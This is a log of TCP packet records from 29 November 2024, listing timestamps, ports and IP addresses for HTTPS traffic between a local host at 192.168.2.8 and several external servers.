Nov 29, 2024 12:28:09.935511112 CET	443	49812	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.935551882 CET	443	49812	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.935600996 CET	49812	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.935635090 CET	49812	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.936480999 CET	49812	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.936497927 CET	443	49812	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.936847925 CET	443	49813	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.936908960 CET	443	49813	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.936992884 CET	49813	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.938924074 CET	49813	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.938942909 CET	443	49813	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.963326931 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.987765074 CET	443	49809	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:09.987888098 CET	443	49809	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:09.988485098 CET	49809	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:09.988485098 CET	49809	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:09.988502979 CET	443	49809	13.69.116.108	192.168.2.8
Nov 29, 2024 12:28:09.988529921 CET	49809	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:09.989588022 CET	443	49814	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.989605904 CET	443	49814	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.989664078 CET	49809	443	192.168.2.8	13.69.116.108
Nov 29, 2024 12:28:09.989665031 CET	443	49814	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.989686012 CET	49814	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.989718914 CET	49814	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.991061926 CET	49814	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:09.991080046 CET	443	49814	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:09.995815992 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.995955944 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.995956898 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.995996952 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:09.996059895 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:09.996102095 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.043335915 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.047108889 CET	443	49815	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:10.047171116 CET	443	49815	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:10.047281981 CET	49815	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:10.047319889 CET	443	49815	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:10.047353029 CET	443	49815	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:10.047374964 CET	49815	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:10.047405958 CET	49815	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:10.048300028 CET	49815	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:10.048316002 CET	443	49815	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:10.053970098 CET	443	49816	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:10.054003000 CET	443	49816	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:10.054011106 CET	443	49816	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:10.054078102 CET	443	49816	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:10.054090977 CET	49816	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:10.054131031 CET	49816	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:10.055707932 CET	49816	443	192.168.2.8	104.117.182.56
Nov 29, 2024 12:28:10.055727959 CET	443	49816	104.117.182.56	192.168.2.8
Nov 29, 2024 12:28:10.115524054 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.115642071 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.115696907 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.115822077 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.115852118 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.115968943 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.116976976 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.117044926 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.117156982 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.117199898 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.117207050 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.117328882 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.117358923 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.157269955 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.157372952 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.157373905 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.157413960 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.157449007 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.157470942 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.157475948 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.157483101 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.157495975 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.157519102 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.157535076 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.157551050 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.157603979 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.157615900 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.157633066 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.157649040 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.157664061 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.157737970 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.157757044 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.203321934 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.240236044 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.240355015 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.240416050 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.240470886 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.240577936 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.240623951 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.240705967 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.240725994 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.240829945 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.240843058 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.240864038 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.240880013 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.240890026 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.240912914 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.240933895 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.241147995 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.241175890 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.241194010 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.241200924 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.241210938 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.241246939 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.241250038 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.241259098 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.241285086 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.241285086 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.241296053 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.241303921 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.241316080 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.241323948 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.241349936 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.241353035 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.241377115 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.241396904 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.241399050 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.241416931 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.241435051 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.241451025 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.241455078 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.241460085 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.241477966 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.241478920 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.241482973 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.241540909 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.241609097 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.241635084 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.270829916 CET	443	49817	108.139.47.92	192.168.2.8
Nov 29, 2024 12:28:10.270896912 CET	443	49817	108.139.47.92	192.168.2.8
Nov 29, 2024 12:28:10.270942926 CET	49817	443	192.168.2.8	108.139.47.92
Nov 29, 2024 12:28:10.272399902 CET	49817	443	192.168.2.8	108.139.47.92
Nov 29, 2024 12:28:10.272414923 CET	443	49817	108.139.47.92	192.168.2.8
Nov 29, 2024 12:28:10.278870106 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.278954029 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.279097080 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.279128075 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.279246092 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.279279947 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.311840057 CET	443	49818	20.110.205.119	192.168.2.8
Nov 29, 2024 12:28:10.312077045 CET	49818	443	192.168.2.8	20.110.205.119
Nov 29, 2024 12:28:10.312103987 CET	443	49818	20.110.205.119	192.168.2.8
Nov 29, 2024 12:28:10.312462091 CET	443	49818	20.110.205.119	192.168.2.8
Nov 29, 2024 12:28:10.312895060 CET	49818	443	192.168.2.8	20.110.205.119
Nov 29, 2024 12:28:10.312957048 CET	443	49818	20.110.205.119	192.168.2.8
Nov 29, 2024 12:28:10.313075066 CET	49818	443	192.168.2.8	20.110.205.119
Nov 29, 2024 12:28:10.323322058 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.331978083 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.332129002 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.332163095 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.332377911 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.332411051 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.332417965 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.332551003 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.332580090 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.359324932 CET	443	49818	20.110.205.119	192.168.2.8
Nov 29, 2024 12:28:10.362148046 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.362279892 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.362819910 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.362852097 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.362860918 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.363136053 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.363168955 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.364262104 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.364334106 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.364445925 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.364468098 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.364500046 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.364515066 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.364639044 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.364667892 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.366231918 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.366276026 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.366485119 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.366513968 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.366550922 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.366556883 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.366575003 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.366626024 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.366652966 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.368279934 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.368294954 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.368442059 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.368465900 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.368510962 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.370345116 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.370471954 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.370501995 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.370507002 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.370515108 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.370531082 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.370531082 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.370539904 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.370548964 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.370563984 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.370573044 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.370578051 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.370590925 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.370594025 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.370609045 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.370632887 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.370642900 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.370656013 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.370667934 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.370729923 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.370747089 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.373363018 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.373455048 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.375034094 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.394603968 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.394628048 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.394646883 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.394680977 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.394694090 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.394716978 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.394741058 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.394771099 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.400804043 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.400923967 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.400950909 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.401065111 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.401096106 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.401127100 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.401141882 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.401262999 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.401309013 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.447324991 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.453876019 CET	443	49822	23.57.90.143	192.168.2.8
Nov 29, 2024 12:28:10.454277039 CET	443	49821	23.57.90.143	192.168.2.8
Nov 29, 2024 12:28:10.454649925 CET	49822	443	192.168.2.8	23.57.90.143
Nov 29, 2024 12:28:10.454673052 CET	443	49822	23.57.90.143	192.168.2.8
Nov 29, 2024 12:28:10.454773903 CET	49821	443	192.168.2.8	23.57.90.143
Nov 29, 2024 12:28:10.454797983 CET	443	49821	23.57.90.143	192.168.2.8
Nov 29, 2024 12:28:10.455703974 CET	443	49822	23.57.90.143	192.168.2.8
Nov 29, 2024 12:28:10.455776930 CET	49822	443	192.168.2.8	23.57.90.143
Nov 29, 2024 12:28:10.455979109 CET	443	49821	23.57.90.143	192.168.2.8
Nov 29, 2024 12:28:10.456041098 CET	49821	443	192.168.2.8	23.57.90.143
Nov 29, 2024 12:28:10.456789017 CET	49822	443	192.168.2.8	23.57.90.143
Nov 29, 2024 12:28:10.456989050 CET	443	49822	23.57.90.143	192.168.2.8
Nov 29, 2024 12:28:10.457035065 CET	49821	443	192.168.2.8	23.57.90.143
Nov 29, 2024 12:28:10.457096100 CET	443	49821	23.57.90.143	192.168.2.8
Nov 29, 2024 12:28:10.459820032 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.459943056 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.459991932 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.460014105 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.460134983 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.460167885 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.483489037 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.483587980 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.483809948 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.483906984 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.483947992 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.483984947 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.492983103 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.493030071 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.493278980 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.493396044 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.493436098 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.493666887 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.493727922 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.493757010 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.493788958 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.498657942 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.498804092 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.498883009 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.498922110 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.498925924 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.498955011 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.498966932 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.499049902 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.499082088 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.504240990 CET	49822	443	192.168.2.8	23.57.90.143
Nov 29, 2024 12:28:10.504240990 CET	49821	443	192.168.2.8	23.57.90.143
Nov 29, 2024 12:28:10.504256010 CET	443	49822	23.57.90.143	192.168.2.8
Nov 29, 2024 12:28:10.504259109 CET	443	49821	23.57.90.143	192.168.2.8
Nov 29, 2024 12:28:10.505007029 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.505022049 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.505150080 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.505189896 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.505300999 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.505321980 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.505423069 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.507725954 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.507788897 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.508105040 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.508135080 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.508243084 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.510201931 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.510251045 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.510339975 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.510374069 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.510380030 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.510389090 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.510427952 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.510502100 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.510535002 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.512908936 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.512924910 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.513190031 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.513760090 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.513813972 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.513843060 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.513859034 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.513878107 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.519155025 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.519319057 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.519339085 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.519362926 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.519385099 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.519396067 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.519406080 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.519423962 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.519428968 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.519463062 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.519498110 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.519547939 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.519556046 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.519571066 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.519613981 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.519658089 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.519694090 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.550683022 CET	49822	443	192.168.2.8	23.57.90.143
Nov 29, 2024 12:28:10.551048040 CET	49821	443	192.168.2.8	23.57.90.143
Nov 29, 2024 12:28:10.567327976 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.598221064 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.598607063 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.598650932 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.598669052 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.598836899 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.598865986 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.599502087 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.632225990 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.632298946 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.632544041 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.632680893 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.632719994 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.632754087 CET	49811	443	192.168.2.8	95.217.25.228
Nov 29, 2024 12:28:10.644721985 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.644741058 CET	443	49811	95.217.25.228	192.168.2.8
Nov 29, 2024 12:28:10.644814968 CET	49811	443	192.168.2.8	95.217.25.228
